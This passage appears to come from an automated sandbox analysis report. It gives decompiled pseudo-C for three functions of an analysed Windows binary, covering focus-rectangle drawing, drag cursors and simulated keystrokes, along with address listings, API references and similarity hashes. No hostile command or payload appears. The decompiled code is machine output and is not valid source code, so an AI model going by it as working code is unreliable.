                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProc
                                                                                • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                • API String ID: 1646373207-3712701948
                                                                                • Opcode ID: 7a2e7a6ad3db9ec5b6a148488899aea6f251dff6c7e78eecb5d69a20a1fe6600
                                                                                • Instruction ID: a513fbbfe291899ee6294738837c62684835be1d612828af4dfd11c86fef4dc6
                                                                                • Opcode Fuzzy Hash: 7a2e7a6ad3db9ec5b6a148488899aea6f251dff6c7e78eecb5d69a20a1fe6600
                                                                                • Instruction Fuzzy Hash: 6BD05EA17023026ED300ABA05D8160F2544D300304B21803BE902B52D2E7BC885146CE
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00463678, Relevance: 6.2, APIs: 4, Instructions: 225windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 95%
                                                                                			E00463678(char __eax, intOrPtr __ecx, void* __edx, void* _a8) {
				char _v8;
				intOrPtr _v12;
				struct tagRECT _v28;
				intOrPtr _v32;
				struct HWND__* _v36;
				signed short _v38;
				char _v39;
				char _v40;
				signed int _v52;
				void* __edi;
				void* __ebp;
				void* _t93;
				struct HWND__* _t94;
				signed int _t99;
				signed int _t100;
				signed int _t123;
				struct HWND__* _t125;
				signed int _t127;
				signed int _t129;
				void* _t131;
				struct HWND__* _t144;
				struct HWND__* _t145;
				intOrPtr _t148;
				void* _t152;
				struct HWND__* _t153;
				intOrPtr _t155;
				intOrPtr _t159;
				struct HWND__* _t196;
				struct HWND__* _t200;
				long _t209;
				struct HWND__** _t212;
				void* _t213;

				_t180 = __ecx;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v32 = __ecx;
				_v8 = __eax;
				_t212 =  &_v8;
				_t93 = E00460E0C( *((intOrPtr*)( *_t212 + 0x29c)));
				_t214 =  *((intOrPtr*)(_t93 + 8));
				if( *((intOrPtr*)(_t93 + 8)) == 0) {
					E0041F338( *((intOrPtr*)( *((intOrPtr*)( *_t212 + 0x208)) + 0x14)), __ecx,  *((intOrPtr*)( *_t212 + 0x70)),  &_v28, _t213, _t214);
					return E0041F9D0( *((intOrPtr*)( *_t212 + 0x208)),  &_v28);
				}
				_t94 =  *_t212;
				__eflags =  *((char*)(_t94 + 0x2e8)) - 1;
				if( *((char*)(_t94 + 0x2e8)) != 1) {
					L10:
					_t209 = _v28.left;
					_v36 = E004631E0( *_t212, _v32);
					_t99 = _v28.bottom - _v28.top -  *((intOrPtr*)( *_t212 + 0x2b0));
					__eflags = _t99;
					_t100 = _t99 >> 1;
					if(__eflags < 0) {
						asm("adc eax, 0x0");
					}
					_v52 = _t100;
					_t173 =  *((intOrPtr*)( *_t212 + 0x208));
					E0041FCC0( *((intOrPtr*)( *_t212 + 0x208)));
					E0041F338( *((intOrPtr*)( *((intOrPtr*)( *_t212 + 0x208)) + 0x14)), _t180,  *((intOrPtr*)( *_t212 + 0x70)), _t209, _t213, __eflags);
					E0041F9D0( *((intOrPtr*)( *_t212 + 0x208)),  &_v28);
					_v12 = E0041FC00(_t173,  *((intOrPtr*)(_v36 + 8))) + 1;
					__eflags =  *( *_t212 + 0x22c) - _v32;
					if(__eflags == 0) {
						E0041F338( *((intOrPtr*)(_t173 + 0x14)), _t180, 0x8000000d, _t209, _t213, __eflags);
						E0041EB4C( *((intOrPtr*)(_t173 + 0xc)), 0x8000000e);
					}
					_v40 =  *((intOrPtr*)(_v36 + 0x18));
					_v39 = E004617E4(_v36);
					_v38 = E00460EF8(_v36);
					_t123 =  *( *_t212 + 0x2e0) & 0x000000ff;
					__eflags = _t123 - 5;
					if(__eflags > 0) {
						L22:
						_t125 =  *( *_t212 + 0x22c);
						__eflags = _t125 - _v32;
						if(_t125 != _v32) {
							goto L35;
						}
						_t125 = _v36;
						__eflags =  *(_t125 + 8);
						if( *(_t125 + 8) == 0) {
							goto L35;
						}
						_t127 =  *( *_t212 + 0x234);
						_v28.left = _t209 + _t127 * ((_v38 & 0x0000ffff) - 1);
						_t196 =  *_t212;
						__eflags =  *((char*)(_t196 + 0x2e0)) - 4;
						if( *((char*)(_t196 + 0x2e0)) >= 4) {
							_v28.left = _v28.left - _v52;
							_t200 =  *_t212;
							__eflags =  *(_t200 + 0x2e9) & 0x00000001;
							if(( *(_t200 + 0x2e9) & 0x00000001) != 0) {
								_t76 =  &_v28;
								 *_t76 = _v28.left + _t127;
								__eflags =  *_t76;
							}
						}
						_t129 =  *( *_t212 + 0x2e0);
						__eflags = _t129;
						if(_t129 != 0) {
							__eflags = _t129 - 4;
							if(_t129 != 4) {
								_t80 =  &_v28;
								 *_t80 = _v28.left +  *( *_t212 + 0x234);
								__eflags =  *_t80;
							}
						}
						__eflags = _t129 - 3;
						if(_t129 == 3) {
							_t83 =  &_v28;
							 *_t83 = _v28.left +  *( *_t212 + 0x234);
							__eflags =  *_t83;
						}
						_t131 = E0043BD14( *_t212);
						_t125 = GetFocus();
						__eflags = _t131 - _t125;
						if(_t131 != _t125) {
							goto L35;
						} else {
							_t125 =  *_t212;
							__eflags =  *(_t125 + 0x2e9) & 0x00000002;
							if(( *(_t125 + 0x2e9) & 0x00000002) == 0) {
								goto L35;
							}
							return DrawFocusRect(E0041FDC4( *((intOrPtr*)( *_t212 + 0x208))),  &_v28);
						}
					} else {
						switch( *((intOrPtr*)(_t123 * 4 +  &M00463858))) {
							case 0:
								E00463250(_t213);
								goto L22;
							case 1:
								__eax = E0046345C(__edi, __esi, __ebp);
								goto L22;
							case 2:
								__eax = E004633AC(__edi, __ebp);
								goto L22;
							case 3:
								__eax = E004632A0(__edi, __esi, __ebp);
								goto L22;
							case 4:
								__eax = E0046350C(__edi, __esi, __eflags, __ebp);
								goto L22;
							case 5:
								__eax = E00463594(__edi, __eflags, __ebp);
								goto L22;
						}
					}
				} else {
					_t144 =  *_t212;
					__eflags =  *((short*)(_t144 + 0x2f2));
					if( *((short*)(_t144 + 0x2f2)) == 0) {
						goto L10;
					}
					_t145 =  *_t212;
					__eflags =  *((intOrPtr*)(_t145 + 0x22c)) - _v32;
					if( *((intOrPtr*)(_t145 + 0x22c)) != _v32) {
						_t148 =  *0x463968; // 0x0
						return  *((intOrPtr*)( *_t212 + 0x2f0))(_t148,  &_v28);
					}
					_t152 = E0043BD14( *_t212);
					_t153 = GetFocus();
					__eflags = _t152 - _t153;
					if(_t152 != _t153) {
						_t155 =  *0x463964; // 0x1
						return  *((intOrPtr*)( *_t212 + 0x2f0))(_t155,  &_v28);
					}
					_t159 =  *0x463960; // 0x11
					 *((intOrPtr*)( *_t212 + 0x2f0))(_t159,  &_v28);
					_t125 =  *_t212;
					__eflags =  *(_t125 + 0x2e9) & 0x00000002;
					if(( *(_t125 + 0x2e9) & 0x00000002) == 0) {
						L35:
						return _t125;
					}
					return DrawFocusRect(E0041FDC4( *((intOrPtr*)( *_t212 + 0x208))),  &_v28);
				}
			}



































                                                                                0x00463678
                                                                                0x00463687
                                                                                0x00463688
                                                                                0x00463689
                                                                                0x0046368a
                                                                                0x0046368b
                                                                                0x0046368e
                                                                                0x00463691
                                                                                0x0046369c
                                                                                0x004636a1
                                                                                0x004636a5
                                                                                0x004636b7
                                                                                0x00000000
                                                                                0x004636c1
                                                                                0x004636cb
                                                                                0x004636cd
                                                                                0x004636d4
                                                                                0x00463798
                                                                                0x00463798
                                                                                0x004637a5
                                                                                0x004637b0
                                                                                0x004637b0
                                                                                0x004637b6
                                                                                0x004637b8
                                                                                0x004637ba
                                                                                0x004637ba
                                                                                0x004637bd
                                                                                0x004637c2
                                                                                0x004637cf
                                                                                0x004637dc
                                                                                0x004637e6
                                                                                0x004637f9
                                                                                0x00463804
                                                                                0x00463807
                                                                                0x00463811
                                                                                0x0046381e
                                                                                0x0046381e
                                                                                0x00463829
                                                                                0x00463834
                                                                                0x0046383f
                                                                                0x00463845
                                                                                0x0046384c
                                                                                0x0046384f
                                                                                0x004638a4
                                                                                0x004638a6
                                                                                0x004638ac
                                                                                0x004638af
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004638b5
                                                                                0x004638b8
                                                                                0x004638bc
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004638c4
                                                                                0x004638d6
                                                                                0x004638d9
                                                                                0x004638db
                                                                                0x004638e2
                                                                                0x004638e7
                                                                                0x004638ea
                                                                                0x004638ec
                                                                                0x004638f3
                                                                                0x004638f5
                                                                                0x004638f5
                                                                                0x004638f5
                                                                                0x004638f5
                                                                                0x004638f3
                                                                                0x004638fa
                                                                                0x00463900
                                                                                0x00463902
                                                                                0x00463904
                                                                                0x00463906
                                                                                0x00463910
                                                                                0x00463910
                                                                                0x00463910
                                                                                0x00463910
                                                                                0x00463906
                                                                                0x00463913
                                                                                0x00463915
                                                                                0x0046391f
                                                                                0x0046391f
                                                                                0x0046391f
                                                                                0x0046391f
                                                                                0x00463924
                                                                                0x0046392b
                                                                                0x00463930
                                                                                0x00463932
                                                                                0x00000000
                                                                                0x00463934
                                                                                0x00463934
                                                                                0x00463936
                                                                                0x0046393d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00463951
                                                                                0x00463851
                                                                                0x00463851
                                                                                0x00000000
                                                                                0x00463871
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0046387a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0046388c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00463883
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00463895
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0046389e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00463851
                                                                                0x004636da
                                                                                0x004636da
                                                                                0x004636dc
                                                                                0x004636e4
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004636ea
                                                                                0x004636f2
                                                                                0x004636f5
                                                                                0x00463779
                                                                                0x00000000
                                                                                0x0046378d
                                                                                0x004636f9
                                                                                0x00463700
                                                                                0x00463705
                                                                                0x00463707
                                                                                0x00463756
                                                                                0x00000000
                                                                                0x0046376a
                                                                                0x0046370d
                                                                                0x00463721
                                                                                0x00463727
                                                                                0x00463729
                                                                                0x00463730
                                                                                0x0046395c
                                                                                0x0046395c
                                                                                0x0046395c
                                                                                0x00000000
                                                                                0x00463748

                                                                                APIs
                                                                                • GetFocus.USER32 ref: 00463700
                                                                                • DrawFocusRect.USER32 ref: 00463748
                                                                                  • Part of subcall function 0041F9D0: FillRect.USER32 ref: 0041F9F8
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: FocusRect$DrawFill
                                                                                • String ID:
                                                                                • API String ID: 3476037706-0
                                                                                • Opcode ID: 023c5798b253df13c47e7574b285c89412524badf52f1e32af48fe517b180565
                                                                                • Instruction ID: 8f207b3e41a278f91515001cd5490541224029e2ee33265223180d2149407fd5
                                                                                • Opcode Fuzzy Hash: 023c5798b253df13c47e7574b285c89412524badf52f1e32af48fe517b180565
                                                                                • Instruction Fuzzy Hash: 79917E74A001458FCB10EF58C4C5AAEB7F5BF08315F2444BAE9849B316E778AD86CB99
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004335B0, Relevance: 6.2, APIs: 4, Instructions: 204COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 93%
                                                                                			E004335B0(intOrPtr* __eax, signed int __edx) {
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v28;
				intOrPtr _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr* _t60;
				intOrPtr* _t62;
				struct HICON__* _t65;
				intOrPtr _t67;
				intOrPtr* _t72;
				intOrPtr _t74;
				intOrPtr* _t75;
				intOrPtr _t78;
				intOrPtr _t80;
				intOrPtr _t82;
				intOrPtr _t84;
				intOrPtr _t85;
				struct HWND__* _t88;
				intOrPtr _t89;
				intOrPtr _t91;
				intOrPtr* _t93;
				intOrPtr _t97;
				intOrPtr _t100;
				intOrPtr _t102;
				intOrPtr _t103;
				intOrPtr _t104;
				intOrPtr _t106;
				struct HWND__* _t107;
				intOrPtr _t108;
				intOrPtr _t110;
				intOrPtr _t114;
				intOrPtr _t117;
				char _t118;
				intOrPtr _t119;
				void* _t131;
				intOrPtr _t135;
				intOrPtr _t140;
				intOrPtr* _t155;
				void* _t158;
				void* _t165;
				void* _t166;

				_t155 = __eax;
				if( *0x487ba0 != 0) {
					L3:
					_t49 =  *0x487b80; // 0x0
					_t50 =  *0x487b80; // 0x0
					_t117 = E00433490(_t155,  *((intOrPtr*)(_t50 + 0x9b)),  &_v28, _t49);
					if( *0x487ba0 == 0) {
						_t168 =  *0x487ba4;
						if( *0x487ba4 != 0) {
							_t106 =  *0x487b94; // 0x0
							_t107 = GetDesktopWindow();
							_t108 =  *0x487ba4; // 0x0
							E0043D6C4(_t108, _t107, _t168, _t106);
						}
					}
					_t53 =  *0x487b80; // 0x0
					if( *((char*)(_t53 + 0x9b)) != 0) {
						__eflags =  *0x487ba0;
						_t6 =  &_v24;
						 *_t6 =  *0x487ba0 != 0;
						__eflags =  *_t6;
						 *0x487ba0 = 2;
					} else {
						 *0x487ba0 = 1;
						_v24 = 0;
					}
					_t54 =  *0x487b84; // 0x0
					if(_t117 ==  *((intOrPtr*)(_t54 + 4))) {
						L12:
						_t55 =  *0x487b84; // 0x0
						 *((intOrPtr*)(_t55 + 0xc)) =  *_t155;
						 *((intOrPtr*)(_t55 + 0x10)) =  *((intOrPtr*)(_t155 + 4));
						_t56 =  *0x487b84; // 0x0
						if( *((intOrPtr*)(_t56 + 4)) != 0) {
							_t97 =  *0x487b84; // 0x0
							E004351E4( *((intOrPtr*)(_t97 + 4)),  &_v20, _t155);
							_t100 =  *0x487b84; // 0x0
							 *((intOrPtr*)(_t100 + 0x14)) = _v20;
							 *((intOrPtr*)(_t100 + 0x18)) = _v16;
						}
						_t131 = E004334E0(2);
						_t121 =  *_t155;
						_t60 =  *0x487b84; // 0x0
						_t158 =  *((intOrPtr*)( *_t60 + 4))( *((intOrPtr*)(_t155 + 4)));
						if( *0x487ba4 != 0) {
							if(_t117 == 0 || ( *(_t117 + 0x51) & 0x00000020) != 0) {
								_t82 =  *0x487ba4; // 0x0
								E0043D680(_t82, _t158);
								_t84 =  *0x487ba4; // 0x0
								_t177 =  *((char*)(_t84 + 0x6a));
								if( *((char*)(_t84 + 0x6a)) != 0) {
									_t121 =  *((intOrPtr*)(_t155 + 4));
									_t85 =  *0x487ba4; // 0x0
									E0043D7AC(_t85,  *((intOrPtr*)(_t155 + 4)),  *_t155, __eflags);
								} else {
									_t88 = GetDesktopWindow();
									_t121 =  *_t155;
									_t89 =  *0x487ba4; // 0x0
									E0043D6C4(_t89, _t88, _t177,  *((intOrPtr*)(_t155 + 4)));
								}
							} else {
								_t91 =  *0x487ba4; // 0x0
								E0043D820(_t91, _t131, __eflags);
								_t93 =  *0x486dac; // 0x487c00
								SetCursor(E004536BC( *_t93, _t158));
							}
						}
						_t62 =  *0x486dac; // 0x487c00
						_t65 = SetCursor(E004536BC( *_t62, _t158));
						if( *0x487ba0 != 2) {
							L32:
							return _t65;
						} else {
							_t179 = _t117;
							if(_t117 != 0) {
								_t118 = E0043351C(_t121);
								_t67 =  *0x487b84; // 0x0
								 *((intOrPtr*)(_t67 + 0x58)) = _t118;
								__eflags = _t118;
								if(__eflags != 0) {
									E004351E4(_t118,  &_v24, _t155);
									_t65 = E004037B0(_t118, __eflags);
									_t135 =  *0x487b84; // 0x0
									 *(_t135 + 0x54) = _t65;
								} else {
									_t78 =  *0x487b84; // 0x0
									_t65 = E004037B0( *((intOrPtr*)(_t78 + 4)), __eflags);
									_t140 =  *0x487b84; // 0x0
									 *(_t140 + 0x54) = _t65;
								}
							} else {
								_push( *((intOrPtr*)(_t155 + 4)));
								_t80 =  *0x487b84; // 0x0
								_t65 = E004037B0( *((intOrPtr*)(_t80 + 0x38)), _t179);
							}
							if( *0x487b84 == 0) {
								goto L32;
							} else {
								_t119 =  *0x487b84; // 0x0
								_t41 = _t119 + 0x5c; // 0x5c
								_t42 = _t119 + 0x44; // 0x44
								_t65 = E0040845C(_t42, 0x10, _t41);
								if(_t65 != 0) {
									goto L32;
								}
								if(_v28 != 0) {
									_t75 =  *0x487b84; // 0x0
									 *((intOrPtr*)( *_t75 + 0x34))();
								}
								_t72 =  *0x487b84; // 0x0
								 *((intOrPtr*)( *_t72 + 0x30))();
								_t74 =  *0x487b84; // 0x0
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								return _t74;
							}
						}
					}
					_t65 = E004334E0(1);
					if( *0x487b84 == 0) {
						goto L32;
					}
					_t102 =  *0x487b84; // 0x0
					 *((intOrPtr*)(_t102 + 4)) = _t117;
					_t103 =  *0x487b84; // 0x0
					 *((intOrPtr*)(_t103 + 8)) = _v28;
					_t104 =  *0x487b84; // 0x0
					 *((intOrPtr*)(_t104 + 0xc)) =  *_t155;
					 *((intOrPtr*)(_t104 + 0x10)) =  *((intOrPtr*)(_t155 + 4));
					_t65 = E004334E0(0);
					if( *0x487b84 == 0) {
						goto L32;
					}
					goto L12;
				}
				_t110 =  *0x487b90; // 0x0
				asm("cdq");
				_t165 = (_t110 -  *__eax ^ __edx) - __edx -  *0x487b9c; // 0x0
				if(_t165 >= 0) {
					goto L3;
				}
				_t114 =  *0x487b94; // 0x0
				asm("cdq");
				_t65 = (_t114 -  *((intOrPtr*)(__eax + 4)) ^ __edx) - __edx;
				_t166 = _t65 -  *0x487b9c; // 0x0
				if(_t166 < 0) {
					goto L32;
				}
				goto L3;
			}

















































                                                                                0x004335b6
                                                                                0x004335bf
                                                                                0x004335ee
                                                                                0x004335ee
                                                                                0x004335f4
                                                                                0x0043360a
                                                                                0x00433613
                                                                                0x00433615
                                                                                0x0043361c
                                                                                0x0043361e
                                                                                0x00433624
                                                                                0x00433631
                                                                                0x00433636
                                                                                0x00433636
                                                                                0x0043361c
                                                                                0x0043363b
                                                                                0x00433647
                                                                                0x00433657
                                                                                0x0043365e
                                                                                0x0043365e
                                                                                0x0043365e
                                                                                0x00433663
                                                                                0x00433649
                                                                                0x00433649
                                                                                0x00433650
                                                                                0x00433650
                                                                                0x0043366a
                                                                                0x00433672
                                                                                0x004336bf
                                                                                0x004336bf
                                                                                0x004336c6
                                                                                0x004336cc
                                                                                0x004336cf
                                                                                0x004336d8
                                                                                0x004336e0
                                                                                0x004336e8
                                                                                0x004336ed
                                                                                0x004336f6
                                                                                0x004336fd
                                                                                0x004336fd
                                                                                0x0043370b
                                                                                0x0043370d
                                                                                0x0043370f
                                                                                0x00433719
                                                                                0x00433722
                                                                                0x00433726
                                                                                0x00433730
                                                                                0x00433735
                                                                                0x0043373a
                                                                                0x0043373f
                                                                                0x00433743
                                                                                0x0043375e
                                                                                0x00433763
                                                                                0x00433768
                                                                                0x00433745
                                                                                0x00433749
                                                                                0x00433750
                                                                                0x00433752
                                                                                0x00433757
                                                                                0x00433757
                                                                                0x0043376f
                                                                                0x0043376f
                                                                                0x00433774
                                                                                0x0043377c
                                                                                0x00433789
                                                                                0x00433789
                                                                                0x00433726
                                                                                0x00433791
                                                                                0x0043379e
                                                                                0x004337aa
                                                                                0x0043387d
                                                                                0x0043387d
                                                                                0x004337b0
                                                                                0x004337b0
                                                                                0x004337b2
                                                                                0x004337d3
                                                                                0x004337d5
                                                                                0x004337da
                                                                                0x004337dd
                                                                                0x004337df
                                                                                0x0043380d
                                                                                0x0043381c
                                                                                0x00433821
                                                                                0x00433827
                                                                                0x004337e1
                                                                                0x004337e9
                                                                                0x004337f5
                                                                                0x004337fa
                                                                                0x00433800
                                                                                0x00433800
                                                                                0x004337b4
                                                                                0x004337b7
                                                                                0x004337ba
                                                                                0x004337c7
                                                                                0x004337c7
                                                                                0x00433831
                                                                                0x00000000
                                                                                0x00433833
                                                                                0x00433833
                                                                                0x00433839
                                                                                0x0043383c
                                                                                0x00433844
                                                                                0x0043384b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00433852
                                                                                0x00433854
                                                                                0x0043385b
                                                                                0x0043385b
                                                                                0x0043385e
                                                                                0x00433865
                                                                                0x00433868
                                                                                0x00433873
                                                                                0x00433874
                                                                                0x00433875
                                                                                0x00433876
                                                                                0x00000000
                                                                                0x00433876
                                                                                0x00433831
                                                                                0x004337aa
                                                                                0x00433676
                                                                                0x00433682
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00433688
                                                                                0x0043368d
                                                                                0x00433690
                                                                                0x00433698
                                                                                0x0043369b
                                                                                0x004336a2
                                                                                0x004336a8
                                                                                0x004336ad
                                                                                0x004336b9
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004336b9
                                                                                0x004335c1
                                                                                0x004335c8
                                                                                0x004335cd
                                                                                0x004335d3
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004335d5
                                                                                0x004335dd
                                                                                0x004335e0
                                                                                0x004335e2
                                                                                0x004335e8
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000

                                                                                APIs
                                                                                • GetDesktopWindow.USER32 ref: 00433624
                                                                                • GetDesktopWindow.USER32 ref: 00433749
                                                                                • SetCursor.USER32(00000000), ref: 0043379E
                                                                                  • Part of subcall function 0043D820: 73451770.COMCTL32(00000000,?,00433779), ref: 0043D83C
                                                                                  • Part of subcall function 0043D820: ShowCursor.USER32(000000FF,00000000,?,00433779), ref: 0043D857
                                                                                • SetCursor.USER32(00000000), ref: 00433789
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Cursor$DesktopWindow$73451770Show
                                                                                • String ID:
                                                                                • API String ID: 3513720257-0
                                                                                • Opcode ID: 5190dd761afb9cb6777465d1d1d9b02bff82538c644734909bf12f8524cc6476
                                                                                • Instruction ID: 927c149ca72bb9ae92c7face1fd7a0d2d6f86c9ae587c9d497579464b7a0dd95
                                                                                • Opcode Fuzzy Hash: 5190dd761afb9cb6777465d1d1d9b02bff82538c644734909bf12f8524cc6476
                                                                                • Instruction Fuzzy Hash: 0E91A5746092418FC304EF69D995A1A7BE2BF48369F2488BEE4148B372D738FD45CB49
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00458744, Relevance: 6.2, APIs: 4, Instructions: 163windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 82%
                                                                                			E00458744(intOrPtr __eax, void* __ebx, intOrPtr __edx, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v268;
				char _v508;
				char _v524;
				char _v528;
				char _v532;
				char _v536;
				char _v540;
				char _v544;
				void* _t75;
				intOrPtr _t91;
				char* _t97;
				signed int _t107;
				signed int _t114;
				intOrPtr _t121;
				intOrPtr _t133;
				intOrPtr _t135;
				intOrPtr _t146;
				int _t152;
				intOrPtr _t153;
				void* _t163;
				void* _t164;
				intOrPtr _t165;

				_t163 = _t164;
				_t165 = _t164 + 0xfffffde4;
				_v544 = 0;
				_v540 = 0;
				_v536 = 0;
				_v532 = 0;
				_v528 = 0;
				_t133 = __edx;
				_v8 = __eax;
				_push(_t163);
				_push(0x4589a4);
				_push( *[fs:eax]);
				 *[fs:eax] = _t165;
				if(__edx >= 1) {
					E0045820C(_v8,  &_v528);
					if(E0040A92C(_v528, _t133) == 1) {
						_t133 = _t133 - 1;
					}
				}
				_v12 = _t133;
				if(E00458524(_v8) == 0) {
					__eflags = _v12;
					if(_v12 < 0) {
						__eflags = 0;
						_v12 = 0;
					}
					E0045820C(_v8,  &_v540);
					_t75 = E004045D8(_v540);
					__eflags = _t75 - _v12;
					if(_t75 <= _v12) {
						E0045820C(_v8,  &_v544);
						_v12 = E004045D8(_v544);
					}
					E00458720(_v8, _v12, _v12);
					goto L21;
				} else {
					if(_v12 < 0) {
						_v12 = 0;
					}
					_t135 = _v12 + 1;
					E0045820C(_v8,  &_v532);
					if(_t135 < E004045D8(_v532)) {
						E0045820C(_v8,  &_v536);
						asm("bt [edx], eax");
						if(( *(_v536 + _t135 - 1) & 0x000000ff) < 0) {
							_t135 = _t135 + 1;
						}
					}
					_t24 = _v8 + 0x228; // 0xda6855c0
					_t91 =  *_t24;
					if(_t91 <= _v12) {
						_v12 = _t91;
						_t135 = _v12;
					}
					E00458720(_v8, _t135, _t135);
					if(_t135 == _v12) {
						 *((intOrPtr*)(_v8 + 0x230)) = _v12;
						L21:
						__eflags = 0;
						_pop(_t146);
						 *[fs:eax] = _t146;
						_push(0x4589ab);
						return E00404344( &_v544, 5);
					} else {
						GetKeyboardState( &_v268);
						_t152 = 0x100;
						_t97 =  &_v524;
						do {
							 *_t97 = 0;
							_t97 = _t97 + 1;
							_t152 = _t152 - 1;
							_t177 = _t152;
						} while (_t152 != 0);
						_v508 = 0x81;
						 *((char*)(_t163 + ( *(0x46bc44 + (E004037B0(_v8, _t177) & 0x0000007f) * 2) & 0x0000ffff) - 0x208)) = 0x81;
						SetKeyboardState( &_v524);
						 *((char*)(_v8 + 0x23c)) = 1;
						_push(_t163);
						_push(0x458912);
						_push( *[fs:eax]);
						 *[fs:eax] = _t165;
						_t107 = E004037B0(_v8, _t177);
						SendMessageA(E0043BD14(_v8), 0x100,  *(0x46bc44 + (_t107 & 0x0000007f) * 2) & 0x0000ffff, 1);
						_t114 = E004037B0(_v8, _t177);
						SendMessageA(E0043BD14(_v8), 0x101,  *(0x46bc44 + (_t114 & 0x0000007f) * 2) & 0x0000ffff, 1);
						_pop(_t153);
						 *[fs:eax] = _t153;
						_push(0x458919);
						_t121 = _v8;
						 *((char*)(_t121 + 0x23c)) = 0;
						return _t121;
					}
				}
			}



























                                                                                0x00458745
                                                                                0x00458747
                                                                                0x00458751
                                                                                0x00458757
                                                                                0x0045875d
                                                                                0x00458763
                                                                                0x00458769
                                                                                0x0045876f
                                                                                0x00458771
                                                                                0x00458776
                                                                                0x00458777
                                                                                0x0045877c
                                                                                0x0045877f
                                                                                0x00458785
                                                                                0x00458790
                                                                                0x004587a4
                                                                                0x004587a6
                                                                                0x004587a6
                                                                                0x004587a4
                                                                                0x004587a7
                                                                                0x004587b4
                                                                                0x00458933
                                                                                0x00458937
                                                                                0x00458939
                                                                                0x0045893b
                                                                                0x0045893b
                                                                                0x00458947
                                                                                0x00458952
                                                                                0x00458957
                                                                                0x0045895a
                                                                                0x00458965
                                                                                0x00458975
                                                                                0x00458975
                                                                                0x00458981
                                                                                0x00000000
                                                                                0x004587ba
                                                                                0x004587be
                                                                                0x004587c2
                                                                                0x004587c2
                                                                                0x004587c8
                                                                                0x004587d2
                                                                                0x004587e4
                                                                                0x004587ef
                                                                                0x00458809
                                                                                0x0045880c
                                                                                0x0045880e
                                                                                0x0045880e
                                                                                0x0045880c
                                                                                0x00458812
                                                                                0x00458812
                                                                                0x0045881b
                                                                                0x0045881d
                                                                                0x00458820
                                                                                0x00458820
                                                                                0x0045882a
                                                                                0x00458832
                                                                                0x0045892b
                                                                                0x00458986
                                                                                0x00458986
                                                                                0x00458988
                                                                                0x0045898b
                                                                                0x0045898e
                                                                                0x004589a3
                                                                                0x00458838
                                                                                0x0045883f
                                                                                0x00458844
                                                                                0x00458849
                                                                                0x0045884f
                                                                                0x0045884f
                                                                                0x00458852
                                                                                0x00458853
                                                                                0x00458853
                                                                                0x00458853
                                                                                0x00458856
                                                                                0x00458874
                                                                                0x00458883
                                                                                0x0045888b
                                                                                0x00458894
                                                                                0x00458895
                                                                                0x0045889a
                                                                                0x0045889d
                                                                                0x004588a9
                                                                                0x004588c8
                                                                                0x004588d6
                                                                                0x004588f5
                                                                                0x004588fc
                                                                                0x004588ff
                                                                                0x00458902
                                                                                0x00458907
                                                                                0x0045890a
                                                                                0x00458911
